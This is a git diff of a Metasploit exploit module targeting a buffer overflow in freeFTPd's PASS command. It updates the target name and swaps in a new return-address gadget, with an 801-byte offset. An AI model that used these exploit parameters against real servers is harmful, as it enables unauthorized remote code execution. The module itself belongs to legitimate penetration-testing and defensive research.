diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index b04d24a157..e0633f3ba0 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "freeFTPd 1.0.10 (PASS Command)", + 'Name' => "freeFTPd 1.0.10 and below (PASS Command)", 'Description' => %q{ freeFTPd contains an overflow condition that is triggered as user-supplied input is not properly validated when handling a specially crafted PASS command. This @@ -43,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => [ ARCH_X86 ], 'Targets' => [ - ['freeFTPd 1.0.10 on Windows Desktop Version', + ['freeFTPd 1.0.10 and below on Windows Desktop Version', { - 'Ret' => 0x004142f0, # pop ebp # pop ebx # ret 0x04 [FreeFTPDService.exe] + 'Ret' => 0x004014bb, # pop edi # pop esi # ret 0x04 [FreeFTPDService.exe] 'Offset' => 801, } ],